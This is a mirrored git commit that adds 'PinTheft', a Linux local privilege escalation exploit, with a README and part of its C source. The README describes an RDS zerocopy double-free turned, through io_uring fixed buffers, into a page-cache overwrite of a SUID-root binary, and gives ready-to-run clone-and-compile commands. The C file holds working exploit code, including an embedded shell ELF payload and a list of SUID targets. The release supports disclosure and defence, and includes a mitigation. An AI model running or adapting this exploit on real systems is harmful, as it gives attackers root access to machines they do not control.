mirror of
https://github.com/v12-security/pocs.git
synced 2026-05-26 16:40:48 +00:00
Merge branch 'main' into main
This commit is contained in:
commit
f1a1169d80
3 changed files with 952 additions and 0 deletions
|
|
@ -9,3 +9,5 @@ Released pocs in this repo:
|
||||||
- [TerraMaster RCE](terramaster) (2026-05-18)
|
- [TerraMaster RCE](terramaster) (2026-05-18)
|
||||||
|
|
||||||
Forked by [V12](https://github.com/v12-security/pocs) original repository
|
Forked by [V12](https://github.com/v12-security/pocs) original repository
|
||||||
|
|
||||||
|
All PoCs in this repo are based on already publicly known bugs/patches.
|
||||||
164
pintheft/README.md
Normal file
164
pintheft/README.md
Normal file
|
|
@ -0,0 +1,164 @@
|
||||||
|
# PinTheft
|
||||||
|
|
||||||
|
https://github.com/user-attachments/assets/5d411fb7-24c3-49d6-b8f7-ae73f80300a9
|
||||||
|
|
||||||
|
## Abstract
|
||||||
|
|
||||||
|
PinTheft is a Linux local privilege escalation exploit for an RDS zerocopy
|
||||||
|
double-free that can be turned into a page-cache overwrite through `io_uring`
|
||||||
|
fixed buffers.
|
||||||
|
|
||||||
|
PinTheft was discovered with [V12](https://v12.sh) by Aaron Esau of the
|
||||||
|
[V12 security team](https://x.com/v12sec). We duped on this bug with some other teams
|
||||||
|
and a [patch](https://lore.kernel.org/netdev/20260505234336.2132721-1-achender@kernel.org/) is available
|
||||||
|
so we are releasing our PoC.
|
||||||
|
|
||||||
|
> Want to find issues like this in your own code? Try V12 at [v12.sh](https://v12.sh).
|
||||||
|
|
||||||
|
The bug lived in the RDS zerocopy send path. `rds_message_zcopy_from_user()`
|
||||||
|
pins user pages one at a time. If a later page faults, the error path drops the
|
||||||
|
pages it already pinned, and later RDS message cleanup drops them again because
|
||||||
|
the scatterlist entries and entry count remain live after the zcopy notifier is
|
||||||
|
cleared. Each failed zerocopy send can steal one reference from the first page.
|
||||||
|
|
||||||
|
The PoC uses `io_uring` to make that refcount bug useful. It registers an
|
||||||
|
anonymous page as a fixed buffer, giving the page a `FOLL_PIN` bias of 1024
|
||||||
|
references. It then steals those references with failing RDS zerocopy sends,
|
||||||
|
frees the page, reclaims it as page cache for a SUID-root binary, and uses the
|
||||||
|
stale `io_uring` fixed-buffer page pointer to overwrite that page cache with a
|
||||||
|
small ELF payload. Executing the SUID binary drops into a root shell.
|
||||||
|
|
||||||
|
Sadly, the RDS kernel module this requires is only default on Arch Linux among
|
||||||
|
the common distributions we tested.
|
||||||
|
|
||||||
|
## "PinTheft"?
|
||||||
|
|
||||||
|
Because the exploit steals `FOLL_PIN` references until `io_uring` is left
|
||||||
|
holding a stolen page pointer.
|
||||||
|
|
||||||
|
## Exploitation
|
||||||
|
|
||||||
|
```
|
||||||
|
cd pintheft && gcc exp poc.c && ./exp
|
||||||
|
```
|
||||||
|
|
||||||
|
One-line version:
|
||||||
|
|
||||||
|
```
|
||||||
|
git clone https://github.com/v12-security/pocs.git && cd pocs/pintheft && gcc -o exp poc.c && ./exp
|
||||||
|
```
|
||||||
|
|
||||||
|
## Requirements
|
||||||
|
|
||||||
|
PinTheft requires:
|
||||||
|
|
||||||
|
- `CONFIG_RDS`
|
||||||
|
- `CONFIG_RDS_TCP`
|
||||||
|
- `CONFIG_IO_URING`
|
||||||
|
- `io_uring_disabled=0`
|
||||||
|
- a readable SUID-root binary
|
||||||
|
- x86_64 for the included payload
|
||||||
|
|
||||||
|
The technique is architecture-independent, but the embedded shell ELF in
|
||||||
|
`poc.c` is x86_64.
|
||||||
|
|
||||||
|
The exploit asks RDS for TCP transport with `SO_RDS_TRANSPORT=2`, which can
|
||||||
|
autoload `rds_tcp` on systems where the module exists and module autoloading is
|
||||||
|
allowed.
|
||||||
|
|
||||||
|
## Cleanup Warning
|
||||||
|
|
||||||
|
PinTheft modifies the target SUID binary's page cache. The on-disk binary is
|
||||||
|
backed up before exploitation and the exploit prints a restore command before
|
||||||
|
executing the corrupted target:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo cp /tmp/.backup_<name>_<pid> <target> && sudo chmod u+s <target>
|
||||||
|
```
|
||||||
|
|
||||||
|
If you are testing on a disposable machine, rebooting or dropping caches also
|
||||||
|
clears the in-memory page-cache overwrite. Do not leave the machine in a state
|
||||||
|
where common SUID programs such as `su`, `mount`, or `passwd` execute the
|
||||||
|
payload from cache.
|
||||||
|
|
||||||
|
## How It Works
|
||||||
|
|
||||||
|
1. **Target selection.** The PoC searches for a readable SUID-root binary,
|
||||||
|
preferring paths such as `/usr/bin/su`, `/bin/su`, `/usr/bin/mount`,
|
||||||
|
`/usr/bin/passwd`, and `/usr/bin/pkexec`.
|
||||||
|
|
||||||
|
2. **Safety backup.** The selected target is copied to `/tmp/.backup_<name>_<pid>`
|
||||||
|
before exploitation.
|
||||||
|
|
||||||
|
3. **Page setup.** The exploit pins itself to CPU 0, maps two pages, touches the
|
||||||
|
first page, and marks the second page `PROT_NONE` so a two-page RDS zcopy
|
||||||
|
send will fault after the first page has already been pinned.
|
||||||
|
|
||||||
|
4. **Fixed-buffer registration.** The first page is registered with `io_uring`
|
||||||
|
through `IORING_REGISTER_BUFFERS`. This pins the page with
|
||||||
|
`GUP_PIN_COUNTING_BIAS`, adding 1024 references.
|
||||||
|
|
||||||
|
5. **Clone-buffer hold.** The fixed buffer is cloned into a second `io_uring`
|
||||||
|
instance with `IORING_REGISTER_CLONE_BUFFERS`. A daemon child keeps that
|
||||||
|
second ring fd open so `io_buffer_unmap()` does not later unpin the buffer
|
||||||
|
and corrupt whatever page has been reclaimed into the freed frame.
|
||||||
|
|
||||||
|
6. **Reference theft.** The exploit performs 1024 failing RDS zerocopy sends.
|
||||||
|
Each send pins the first page, faults on the guard page, and then double-drops
|
||||||
|
the first page during the RDS error cleanup path. This consumes the 1024
|
||||||
|
`FOLL_PIN` references while `io_uring` still retains the raw `struct page *`.
|
||||||
|
|
||||||
|
7. **Clean free.** The selected SUID binary's first page is evicted from page
|
||||||
|
cache. The exploit drains the per-CPU page list, then unmaps the user page.
|
||||||
|
Because the remaining reference is the normal mapping reference, the free
|
||||||
|
path clears memcg state cleanly before returning the page to the allocator.
|
||||||
|
|
||||||
|
8. **Page-cache reclaim.** Reading the SUID binary immediately after the free
|
||||||
|
causes page cache allocation to reuse the just-freed page. The stale
|
||||||
|
`io_uring` fixed-buffer entry now points at a live page-cache page.
|
||||||
|
|
||||||
|
9. **Dangling fixed-buffer write.** The exploit creates a temporary payload file
|
||||||
|
and submits `IORING_OP_READ_FIXED`. The kernel reads payload bytes into the
|
||||||
|
registered fixed buffer, but that fixed buffer's `struct page *` now refers
|
||||||
|
to the SUID binary's page cache.
|
||||||
|
|
||||||
|
10. **Verification and execution.** The PoC verifies that the SUID binary's
|
||||||
|
first cached bytes match the embedded ELF payload, destroys the first ring,
|
||||||
|
and execs the target to obtain a root shell.
|
||||||
|
|
||||||
|
## Affected Code Paths
|
||||||
|
|
||||||
|
The PoC targets the RDS zerocopy send path and depends on TCP transport:
|
||||||
|
|
||||||
|
- `rds_message_zcopy_from_user()`
|
||||||
|
- RDS zerocopy error cleanup
|
||||||
|
- RDS message purge cleanup
|
||||||
|
- `SO_RDS_TRANSPORT=RDS_TRANS_TCP`
|
||||||
|
|
||||||
|
The exploitation primitive also depends on `io_uring` fixed-buffer behavior,
|
||||||
|
specifically registered buffers retaining raw page references and cloned buffer
|
||||||
|
state delaying unpin cleanup.
|
||||||
|
|
||||||
|
## Affected Versions
|
||||||
|
|
||||||
|
The PoC was written for kernels with RDS, RDS TCP, and `io_uring` enabled. It
|
||||||
|
also handles kernels with `CONFIG_INIT_ON_ALLOC_DEFAULT_ON` by arranging for the
|
||||||
|
target page to be populated after allocator zeroing and after the filesystem
|
||||||
|
fills the page from disk.
|
||||||
|
|
||||||
|
Confirmed default exposure is limited by module availability. The required RDS
|
||||||
|
module is default on Arch Linux, but not on most common distribution kernels we
|
||||||
|
checked.
|
||||||
|
|
||||||
|
## Mitigation
|
||||||
|
|
||||||
|
If RDS is not needed, disable or block it:
|
||||||
|
|
||||||
|
```
|
||||||
|
rmmod rds_tcp rds
|
||||||
|
printf 'install rds /bin/false\ninstall rds_tcp /bin/false\n' > /etc/modprobe.d/pintheft.conf
|
||||||
|
```
|
||||||
|
|
||||||
|
## Credit
|
||||||
|
|
||||||
|
Found with V12 by Aaron Esau of the V12 security team: [v12.sh](https://v12.sh): dangerously powerful agentic security.
|
||||||
786
pintheft/poc.c
Normal file
786
pintheft/poc.c
Normal file
|
|
@ -0,0 +1,786 @@
|
||||||
|
/*
|
||||||
|
* RDS zcopy double-free -> LPE via io_uring page cache overwrite
|
||||||
|
*
|
||||||
|
* Bug: rds_message_zcopy_from_user() pins user pages via GUP (FOLL_GET) one
|
||||||
|
* at a time. If a later page faults, the error path put_page()s the already
|
||||||
|
* pinned pages, then rds_message_purge() __free_page()s them again because
|
||||||
|
* op_mmp_znotifier was NULLed but op_nents/sg entries were left intact. When
|
||||||
|
* the page still has other references, __free_page silently decrements the
|
||||||
|
* refcount. Each failing sendmsg steals exactly one ref from the first page.
|
||||||
|
*
|
||||||
|
* On kernels with CONFIG_INIT_ON_ALLOC_DEFAULT_ON (which enables the
|
||||||
|
* check_pages static key), __free_pages_prepare will see nonzero memcg_data
|
||||||
|
* on a charged page and call bad_page(). init_on_alloc also zeros every
|
||||||
|
* newly allocated page, destroying any payload placed before allocation.
|
||||||
|
*
|
||||||
|
* We bypass both. Pin the target page via io_uring REGISTER_BUFFERS, which
|
||||||
|
* adds GUP_PIN_COUNTING_BIAS (1024) to the refcount through FOLL_PIN. Steal
|
||||||
|
* all 1024 pin refs with failing zcopy sends. The page refcount is now ~1
|
||||||
|
* (just the PTE mapping). munmap takes the normal __folio_put path, which
|
||||||
|
* calls mem_cgroup_uncharge (clearing memcg_data) before freeing. No
|
||||||
|
* bad_page check fires. Page freed cleanly to PCP.
|
||||||
|
*
|
||||||
|
* io_uring keeps the raw struct page* in its bvec array with no liveness
|
||||||
|
* checks. After the page is reclaimed as page cache for a suid binary,
|
||||||
|
* READ_FIXED writes our payload into it through that dangling pointer. The
|
||||||
|
* write lands after init_on_alloc zeroing and after the fs populates the
|
||||||
|
* page from disk, so the payload survives.
|
||||||
|
*
|
||||||
|
* Closing ring1 would normally unpin the buffer (folio_put_refs with 1024),
|
||||||
|
* corrupting whatever page now lives at that frame. We prevent this with
|
||||||
|
* IORING_REGISTER_CLONE_BUFFERS: cloning to a second ring increments
|
||||||
|
* imu->refs. io_buffer_unmap sees refs > 1 and returns without unpinning.
|
||||||
|
* A forked daemon child holds the clone ring fd open indefinitely.
|
||||||
|
*
|
||||||
|
* PCP is LIFO, so we pin to one CPU and drain stale entries before freeing,
|
||||||
|
* putting our page at the top when the page cache allocator grabs it.
|
||||||
|
*
|
||||||
|
* Chain: register(+1024) -> clone(refs=2) -> daemon holds clone -> steal
|
||||||
|
* 1024 refs -> evict target page cache -> drain PCP -> munmap(free) ->
|
||||||
|
* pread target(reclaim) -> READ_FIXED(overwrite) -> verify -> exec -> root
|
||||||
|
*
|
||||||
|
* Requires CONFIG_RDS, CONFIG_RDS_TCP (auto-loaded via SO_RDS_TRANSPORT=2
|
||||||
|
* since the zcopy path checks t_type == RDS_TRANS_TCP), CONFIG_IO_URING
|
||||||
|
* with io_uring_disabled=0, and a readable suid-root binary. No capabilities
|
||||||
|
* needed. x86_64 payload, technique is arch-independent.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#define _GNU_SOURCE
|
||||||
|
#include <errno.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <sched.h>
|
||||||
|
#include <signal.h>
|
||||||
|
#include <stdint.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
#include <arpa/inet.h>
|
||||||
|
#include <linux/io_uring.h>
|
||||||
|
#include <linux/rds.h>
|
||||||
|
#include <net/if.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <sys/mman.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <sys/syscall.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/wait.h>
|
||||||
|
|
||||||
|
#define PAGE_SIZE 4096
|
||||||
|
#define GUP_PIN_COUNTING_BIAS 1024
|
||||||
|
#define PORT_BASE 20000
|
||||||
|
#define MAX_RETRIES 5
|
||||||
|
|
||||||
|
static const uint8_t SHELL_ELF[129] = {
|
||||||
|
0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||||||
|
0x03,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||||||
|
0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||||||
|
0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,
|
||||||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||||||
|
0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||||||
|
0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0xb0,0x69,0x0f,0x05,0x48,0x8d,
|
||||||
|
0x3d,0xdb,0xff,0xff,0xff,0x6a,0x00,0x57,0x48,0x89,0xe6,0x31,0xd2,0xb0,0x3b,0x0f,
|
||||||
|
0x05,
|
||||||
|
};
|
||||||
|
|
||||||
|
static const char *suid_candidates[] = {
|
||||||
|
"/usr/bin/su",
|
||||||
|
"/bin/su",
|
||||||
|
"/usr/bin/mount",
|
||||||
|
"/usr/bin/passwd",
|
||||||
|
"/usr/bin/chsh",
|
||||||
|
"/usr/bin/newgrp",
|
||||||
|
"/usr/bin/umount",
|
||||||
|
"/usr/bin/pkexec",
|
||||||
|
"/mnt/suid_helper",
|
||||||
|
NULL,
|
||||||
|
};
|
||||||
|
|
||||||
|
#define ANSI_RESET "\033[0m"
|
||||||
|
#define ANSI_BOLD "\033[1m"
|
||||||
|
#define ANSI_RED "\033[1;31m"
|
||||||
|
#define ANSI_GREEN "\033[1;32m"
|
||||||
|
#define ANSI_YELLOW "\033[1;33m"
|
||||||
|
#define ANSI_CYAN "\033[1;36m"
|
||||||
|
#define ANSI_WHITE "\033[1;37m"
|
||||||
|
|
||||||
|
#define LOG(fmt, ...) fprintf(stderr, ANSI_CYAN "[*]" ANSI_RESET " " fmt "\n", ##__VA_ARGS__)
|
||||||
|
#define ERR(fmt, ...) fprintf(stderr, ANSI_RED "[-]" ANSI_RESET " " fmt "\n", ##__VA_ARGS__)
|
||||||
|
#define OK(fmt, ...) fprintf(stderr, ANSI_GREEN "[+]" ANSI_RESET " " fmt "\n", ##__VA_ARGS__)
|
||||||
|
|
||||||
|
/*
|
||||||
|
* draw_page_chain — visualise the 3-node handle→pointer→page relationship.
|
||||||
|
*
|
||||||
|
* [io_uring bvec] ──arr──▶ [struct page *] ──arr──▶ [page state]
|
||||||
|
*
|
||||||
|
* c1/c3: ANSI color for the left/right boxes.
|
||||||
|
* carr/arr: ANSI color + exactly 11-display-column arrow string.
|
||||||
|
* tag1: ≤18 chars, status label for the bvec box.
|
||||||
|
* l3a/l3b: ≤22 chars each, two content lines for the page-state box.
|
||||||
|
*/
|
||||||
|
static void draw_page_chain(
|
||||||
|
const char *c1, const char *tag1,
|
||||||
|
const char *carr, const char *arr,
|
||||||
|
const char *c3, const char *l3a, const char *l3b)
|
||||||
|
{
|
||||||
|
fprintf(stderr, "\n"
|
||||||
|
/* top borders */
|
||||||
|
" %s┌────────────────────┐%s "
|
||||||
|
"┌──────────────────────┐ "
|
||||||
|
"%s┌──────────────────────────┐%s\n"
|
||||||
|
/* content row 1: arrow lives here */
|
||||||
|
" %s│ io_uring bvec │%s %s%s%s "
|
||||||
|
"│ struct page * │ %s%s%s "
|
||||||
|
"%s│ %-22.22s │%s\n"
|
||||||
|
/* content row 2 */
|
||||||
|
" %s│ %-18.18s│%s "
|
||||||
|
"│ (kernel vaddr) │ "
|
||||||
|
"%s│ %-22.22s │%s\n"
|
||||||
|
/* bottom borders */
|
||||||
|
" %s└────────────────────┘%s "
|
||||||
|
"└──────────────────────┘ "
|
||||||
|
"%s└──────────────────────────┘%s\n\n",
|
||||||
|
c1, ANSI_RESET, c3, ANSI_RESET,
|
||||||
|
c1, ANSI_RESET, carr, arr, ANSI_RESET, carr, arr, ANSI_RESET, c3, l3a, ANSI_RESET,
|
||||||
|
c1, tag1, ANSI_RESET, c3, l3b, ANSI_RESET,
|
||||||
|
c1, ANSI_RESET, c3, ANSI_RESET);
|
||||||
|
}
|
||||||
|
|
||||||
|
static void hexdump(const char *label, const void *data, size_t len) {
|
||||||
|
const uint8_t *p = data;
|
||||||
|
if (label)
|
||||||
|
fprintf(stderr, ANSI_CYAN "[*]" ANSI_RESET " %s (%zu bytes):\n", label, len);
|
||||||
|
for (size_t i = 0; i < len; i += 16) {
|
||||||
|
fprintf(stderr, ANSI_CYAN " %04zx:" ANSI_RESET " ", i);
|
||||||
|
for (size_t j = 0; j < 16; j++) {
|
||||||
|
if (i + j < len)
|
||||||
|
fprintf(stderr, ANSI_YELLOW "%02x " ANSI_RESET, p[i + j]);
|
||||||
|
else
|
||||||
|
fprintf(stderr, " ");
|
||||||
|
if (j == 7) fprintf(stderr, " ");
|
||||||
|
}
|
||||||
|
fprintf(stderr, " " ANSI_GREEN "|");
|
||||||
|
for (size_t j = 0; j < 16 && i + j < len; j++) {
|
||||||
|
uint8_t c = p[i + j];
|
||||||
|
fprintf(stderr, "%c", (c >= 0x20 && c < 0x7f) ? c : '.');
|
||||||
|
}
|
||||||
|
fprintf(stderr, "|" ANSI_RESET "\n");
|
||||||
|
}
|
||||||
|
fprintf(stderr, "\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
static void pin_cpu(int cpu) {
|
||||||
|
cpu_set_t set;
|
||||||
|
CPU_ZERO(&set);
|
||||||
|
CPU_SET(cpu, &set);
|
||||||
|
if (sched_setaffinity(0, sizeof(set), &set) < 0) {
|
||||||
|
perror("sched_setaffinity");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static const char *find_suid_target(void) {
|
||||||
|
for (int i = 0; suid_candidates[i]; i++) {
|
||||||
|
struct stat st;
|
||||||
|
if (stat(suid_candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {
|
||||||
|
OK("found suid target: %s", suid_candidates[i]);
|
||||||
|
return suid_candidates[i];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int backup_target(const char *path) {
|
||||||
|
const char *name = strrchr(path, '/');
|
||||||
|
name = name ? name + 1 : path;
|
||||||
|
char backup[256];
|
||||||
|
snprintf(backup, sizeof(backup), "/tmp/.backup_%s_%d", name, getpid());
|
||||||
|
LOG("backing up %s → %s", path, backup);
|
||||||
|
|
||||||
|
int src = open(path, O_RDONLY);
|
||||||
|
if (src < 0) { perror("open src"); return -1; }
|
||||||
|
int dst = open(backup, O_WRONLY | O_CREAT | O_TRUNC, 0755);
|
||||||
|
if (dst < 0) { perror("open dst"); close(src); return -1; }
|
||||||
|
|
||||||
|
char tmp[4096];
|
||||||
|
ssize_t n;
|
||||||
|
while ((n = read(src, tmp, sizeof(tmp))) > 0) {
|
||||||
|
if (write(dst, tmp, n) != n) { perror("write"); close(src); close(dst); return -1; }
|
||||||
|
}
|
||||||
|
close(src);
|
||||||
|
close(dst);
|
||||||
|
OK("backup created: %s", backup);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int steal_one_ref(void *page_addr, int port) {
|
||||||
|
int fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
|
||||||
|
if (fd < 0) return -1;
|
||||||
|
|
||||||
|
int v = 1;
|
||||||
|
setsockopt(fd, SOL_SOCKET, SO_ZEROCOPY, &v, sizeof(v));
|
||||||
|
int sndbuf = 2 * 4096 * 4;
|
||||||
|
setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf));
|
||||||
|
v = 2;
|
||||||
|
setsockopt(fd, SOL_RDS, SO_RDS_TRANSPORT, &v, sizeof(v));
|
||||||
|
|
||||||
|
struct sockaddr_in a = {
|
||||||
|
.sin_family = AF_INET,
|
||||||
|
.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
|
||||||
|
.sin_port = htons(port),
|
||||||
|
};
|
||||||
|
if (bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) {
|
||||||
|
close(fd);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
a.sin_port = htons(port + 1);
|
||||||
|
struct iovec iov = { page_addr, 2 * PAGE_SIZE };
|
||||||
|
|
||||||
|
char cb[CMSG_SPACE(sizeof(uint32_t))];
|
||||||
|
memset(cb, 0, sizeof(cb));
|
||||||
|
struct cmsghdr *cm = (struct cmsghdr *)cb;
|
||||||
|
cm->cmsg_level = SOL_RDS;
|
||||||
|
cm->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
|
||||||
|
cm->cmsg_len = CMSG_LEN(sizeof(uint32_t));
|
||||||
|
|
||||||
|
struct msghdr m = {
|
||||||
|
.msg_name = &a,
|
||||||
|
.msg_namelen = sizeof(a),
|
||||||
|
.msg_iov = &iov,
|
||||||
|
.msg_iovlen = 1,
|
||||||
|
.msg_control = cb,
|
||||||
|
.msg_controllen = sizeof(cb),
|
||||||
|
};
|
||||||
|
sendmsg(fd, &m, MSG_ZEROCOPY | MSG_DONTWAIT);
|
||||||
|
close(fd);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
struct uring {
|
||||||
|
int fd;
|
||||||
|
void *sq_ring;
|
||||||
|
void *cq_ring;
|
||||||
|
struct io_uring_sqe *sqes;
|
||||||
|
uint32_t *sq_head;
|
||||||
|
uint32_t *sq_tail;
|
||||||
|
uint32_t *sq_mask;
|
||||||
|
uint32_t *sq_array;
|
||||||
|
uint32_t *cq_head;
|
||||||
|
uint32_t *cq_tail;
|
||||||
|
uint32_t *cq_mask;
|
||||||
|
struct io_uring_cqe *cqes;
|
||||||
|
size_t sq_ring_sz;
|
||||||
|
size_t cq_ring_sz;
|
||||||
|
size_t sqes_sz;
|
||||||
|
};
|
||||||
|
|
||||||
|
static int uring_setup(struct uring *r, unsigned entries) {
|
||||||
|
struct io_uring_params p;
|
||||||
|
memset(&p, 0, sizeof(p));
|
||||||
|
|
||||||
|
r->fd = syscall(__NR_io_uring_setup, entries, &p);
|
||||||
|
if (r->fd < 0) {
|
||||||
|
perror("io_uring_setup");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
r->sq_ring_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);
|
||||||
|
r->cq_ring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
|
||||||
|
r->sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);
|
||||||
|
|
||||||
|
r->sq_ring = mmap(NULL, r->sq_ring_sz, PROT_READ | PROT_WRITE,
|
||||||
|
MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQ_RING);
|
||||||
|
if (r->sq_ring == MAP_FAILED) { perror("mmap sq_ring"); return -1; }
|
||||||
|
|
||||||
|
r->cq_ring = mmap(NULL, r->cq_ring_sz, PROT_READ | PROT_WRITE,
|
||||||
|
MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_CQ_RING);
|
||||||
|
if (r->cq_ring == MAP_FAILED) { perror("mmap cq_ring"); return -1; }
|
||||||
|
|
||||||
|
r->sqes = mmap(NULL, r->sqes_sz, PROT_READ | PROT_WRITE,
|
||||||
|
MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQES);
|
||||||
|
if (r->sqes == MAP_FAILED) { perror("mmap sqes"); return -1; }
|
||||||
|
|
||||||
|
r->sq_head = r->sq_ring + p.sq_off.head;
|
||||||
|
r->sq_tail = r->sq_ring + p.sq_off.tail;
|
||||||
|
r->sq_mask = r->sq_ring + p.sq_off.ring_mask;
|
||||||
|
r->sq_array = r->sq_ring + p.sq_off.array;
|
||||||
|
r->cq_head = r->cq_ring + p.cq_off.head;
|
||||||
|
r->cq_tail = r->cq_ring + p.cq_off.tail;
|
||||||
|
r->cq_mask = r->cq_ring + p.cq_off.ring_mask;
|
||||||
|
r->cqes = r->cq_ring + p.cq_off.cqes;
|
||||||
|
|
||||||
|
fprintf(stderr,
|
||||||
|
ANSI_CYAN "[*]" ANSI_RESET " io_uring ring ready:\n"
|
||||||
|
ANSI_CYAN " fd" ANSI_RESET " = " ANSI_YELLOW "%d\n" ANSI_RESET
|
||||||
|
ANSI_CYAN " sq_entries" ANSI_RESET " = " ANSI_YELLOW "%u" ANSI_RESET
|
||||||
|
" sq_ring @ " ANSI_WHITE "%p" ANSI_RESET " (sz " ANSI_YELLOW "0x%zx" ANSI_RESET ")\n"
|
||||||
|
ANSI_CYAN " cq_entries" ANSI_RESET " = " ANSI_YELLOW "%u" ANSI_RESET
|
||||||
|
" cq_ring @ " ANSI_WHITE "%p" ANSI_RESET " (sz " ANSI_YELLOW "0x%zx" ANSI_RESET ")\n"
|
||||||
|
ANSI_CYAN " sqes" ANSI_RESET " @ " ANSI_WHITE "%p" ANSI_RESET
|
||||||
|
" (sz " ANSI_YELLOW "0x%zx" ANSI_RESET ", each " ANSI_YELLOW "0x%zx" ANSI_RESET " bytes)\n",
|
||||||
|
r->fd,
|
||||||
|
p.sq_entries, r->sq_ring, r->sq_ring_sz,
|
||||||
|
p.cq_entries, r->cq_ring, r->cq_ring_sz,
|
||||||
|
r->sqes, r->sqes_sz, sizeof(struct io_uring_sqe));
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int uring_register_buffers(struct uring *r, void *buf, size_t len) {
|
||||||
|
struct iovec iov = { .iov_base = buf, .iov_len = len };
|
||||||
|
int ret = syscall(__NR_io_uring_register, r->fd,
|
||||||
|
IORING_REGISTER_BUFFERS, &iov, 1);
|
||||||
|
if (ret < 0) {
|
||||||
|
perror("io_uring_register buffers");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int uring_clone_buffers(struct uring *dst, struct uring *src) {
|
||||||
|
struct io_uring_clone_buffers arg;
|
||||||
|
memset(&arg, 0, sizeof(arg));
|
||||||
|
arg.src_fd = src->fd;
|
||||||
|
arg.flags = 0;
|
||||||
|
arg.nr = 0; /* clone all */
|
||||||
|
int ret = syscall(__NR_io_uring_register, dst->fd,
|
||||||
|
IORING_REGISTER_CLONE_BUFFERS, &arg, 1);
|
||||||
|
if (ret < 0) {
|
||||||
|
perror("io_uring clone buffers");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
/*
|
||||||
|
* Fork a daemon child that holds ring2_fd open, preventing imu cleanup.
|
||||||
|
* When ring1 is destroyed, io_buffer_unmap sees imu->refs > 1 and skips
|
||||||
|
* the unpin_user_folio call that would corrupt the freed page's refcount.
|
||||||
|
*/
|
||||||
|
static pid_t spawn_ring_holder(int ring2_fd) {
|
||||||
|
pid_t pid = fork();
|
||||||
|
if (pid != 0) return pid; /* parent */
|
||||||
|
/* child: hold ring2_fd open forever */
|
||||||
|
/* clear CLOEXEC so execl doesn't close it */
|
||||||
|
fcntl(ring2_fd, F_SETFD, 0);
|
||||||
|
/* close everything else */
|
||||||
|
for (int fd = 0; fd < 1024; fd++)
|
||||||
|
if (fd != ring2_fd) close(fd);
|
||||||
|
/* become a daemon — just sleep */
|
||||||
|
open("/dev/null", O_RDONLY); /* fd 0 */
|
||||||
|
open("/dev/null", O_WRONLY); /* fd 1 */
|
||||||
|
open("/dev/null", O_WRONLY); /* fd 2 */
|
||||||
|
execl("/bin/sleep", "sleep", "99999", (char *)NULL);
|
||||||
|
_exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
static int uring_submit_read_fixed(struct uring *r, int file_fd,
|
||||||
|
void *buf, uint32_t len) {
|
||||||
|
uint32_t tail = *r->sq_tail;
|
||||||
|
uint32_t idx = tail & *r->sq_mask;
|
||||||
|
|
||||||
|
struct io_uring_sqe *sqe = &r->sqes[idx];
|
||||||
|
memset(sqe, 0, sizeof(*sqe));
|
||||||
|
sqe->opcode = IORING_OP_READ_FIXED;
|
||||||
|
sqe->fd = file_fd;
|
||||||
|
sqe->off = 0;
|
||||||
|
sqe->addr = (uint64_t)(unsigned long)buf;
|
||||||
|
sqe->len = len;
|
||||||
|
sqe->buf_index = 0;
|
||||||
|
sqe->user_data = 0x1234;
|
||||||
|
|
||||||
|
fprintf(stderr,
|
||||||
|
ANSI_CYAN "[*]" ANSI_RESET " SQE[" ANSI_YELLOW "%u" ANSI_RESET "] "
|
||||||
|
ANSI_WHITE "IORING_OP_READ_FIXED" ANSI_RESET ":\n"
|
||||||
|
" fd = " ANSI_YELLOW "%d\n" ANSI_RESET
|
||||||
|
" addr = " ANSI_WHITE "0x%016llx\n" ANSI_RESET
|
||||||
|
" len = " ANSI_YELLOW "0x%x" ANSI_RESET " (%u bytes)\n"
|
||||||
|
" buf_index = " ANSI_YELLOW "%u\n" ANSI_RESET
|
||||||
|
